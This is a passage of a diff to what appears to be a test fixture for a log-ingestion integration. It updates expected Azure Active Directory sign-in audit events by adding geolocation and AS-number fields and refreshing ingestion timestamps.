Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e988fd90-2eff-4ad7-9f02-030a9d73ad6e\",\"InterSystemsId\":\"8571fe85-eb4a-430d-b468-97900e344923\",\"IntraSystemId\":\"d239e473-6687-4ff9-ac65-0e3c59961600\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -5330,6 +5870,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ 
@@ -5410,7 +5962,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970307100Z", + "ingested": "2021-12-14T14:49:08.047442392Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:35\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3cbf15a5-84d0-4b0e-ba8e-c3ed43477293\",\"InterSystemsId\":\"8d662bc0-0011-424d-a7dc-56bfc5a142b4\",\"IntraSystemId\":\"d0a4e1ed-206d-4602-aaae-406a02c5c300\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -5450,6 +6002,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -5530,7 +6094,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970311Z", + "ingested": "2021-12-14T14:49:08.047442960Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:36\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"d2bb7eae-bc6e-42d2-b270-a885ec626235\",\"InterSystemsId\":\"9270f20a-56f2-493e-b6a7-a859adcaf626\",\"IntraSystemId\":\"97aa710f-536f-44c8-a8d5-711dc55f5500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -5570,6 +6134,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -5650,7 +6226,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970314900Z", + "ingested": "2021-12-14T14:49:08.047443525Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:51:49\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"03de6d95-b955-451c-8311-473b6853d774\",\"InterSystemsId\":\"97c52753-c410-438f-89e2-22741e5ccc6a\",\"IntraSystemId\":\"c9ef5d5f-e3af-4669-b465-921d8b58bd00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -5690,6 +6266,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -5770,7 +6358,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970318100Z", + "ingested": "2021-12-14T14:49:08.047444111Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"e48d4214-364e-4731-b2b6-47dabf529218\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"ac8fcffb-7c44-498d-ad6b-24b85a3a1b59\",\"InterSystemsId\":\"9e0a494b-0db0-4481-a70e-eea6124b7018\",\"IntraSystemId\":\"e7a84bcf-41ff-4953-8e99-fb1820685f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000004-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000004-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -5810,6 +6398,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -5890,7 +6490,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970322400Z", + "ingested": "2021-12-14T14:49:08.047444589Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:36\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"880fb7bc-5708-42d1-86a8-760c32ac5e6b\",\"InterSystemsId\":\"9fc4af4c-bf19-4f88-92ac-0fd029ca21bd\",\"IntraSystemId\":\"56fa424b-64bd-4ea5-abc4-38256f8a5600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -5930,6 +6530,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ 
@@ -6010,7 +6622,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970327900Z", + "ingested": "2021-12-14T14:49:08.047445419Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"30c7afcc-f74d-4b5a-898e-ce72da9386b8\",\"InterSystemsId\":\"a35e980b-88be-4343-9691-629473e01983\",\"IntraSystemId\":\"78a2aa65-5026-4124-970a-00e06dc7df00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -6050,6 +6662,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -6130,7 +6754,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970332800Z", + "ingested": "2021-12-14T14:49:08.047446119Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-06T09:28:00\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"d4f90f07-f5c4-4b36-a81c-6c9bae8660d6\",\"InterSystemsId\":\"a89e9b3b-b394-4ecf-8abc-a3f6aaf9237f\",\"IntraSystemId\":\"bfe22fb6-c763-4972-91a7-5b13d3d51400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -6170,6 +6794,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -6250,7 +6886,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970338400Z", + "ingested": "2021-12-14T14:49:08.047446697Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:28:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d2ad235b-d73f-4bd8-8aef-6e4909ee1b7c\",\"InterSystemsId\":\"aca3d9a3-792d-4357-87c6-ef50c3215baa\",\"IntraSystemId\":\"f67a1615-4606-4673-b6fb-68f714fa2200\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -6290,6 +6926,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -6370,7 +7018,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970344Z", + "ingested": "2021-12-14T14:49:08.047447173Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8ff18278-32ca-49d1-8658-91e577e0854f\",\"InterSystemsId\":\"ae211253-88cf-4921-9014-2f9beab64fb0\",\"IntraSystemId\":\"ccfec0f3-498b-43b1-a4c0-fb42f0fb5300\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -6410,6 +7058,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -6490,7 +7150,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970349600Z", + "ingested": "2021-12-14T14:49:08.047447690Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:28:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a3939990-f7b4-4dc5-af4d-42b70a9485ea\",\"InterSystemsId\":\"b3997fcc-6b0e-45b1-b88d-b4ee4a8a7ddc\",\"IntraSystemId\":\"c1ffa732-6576-4f86-9294-44387abc1f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -6530,6 +7190,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -6610,7 +7282,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970355100Z", + "ingested": "2021-12-14T14:49:08.047448192Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"61ba70f4-bd75-4bc2-a681-2e219d920e63\",\"InterSystemsId\":\"b3ab6d58-7b90-45d6-95e3-ee11333ebc34\",\"IntraSystemId\":\"d949d6c2-472e-4901-bd70-96cb90424c00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", 
@@ -6650,6 +7322,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ 
@@ -6730,7 +7414,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970360700Z", + "ingested": "2021-12-14T14:49:08.047448790Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:53:12\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 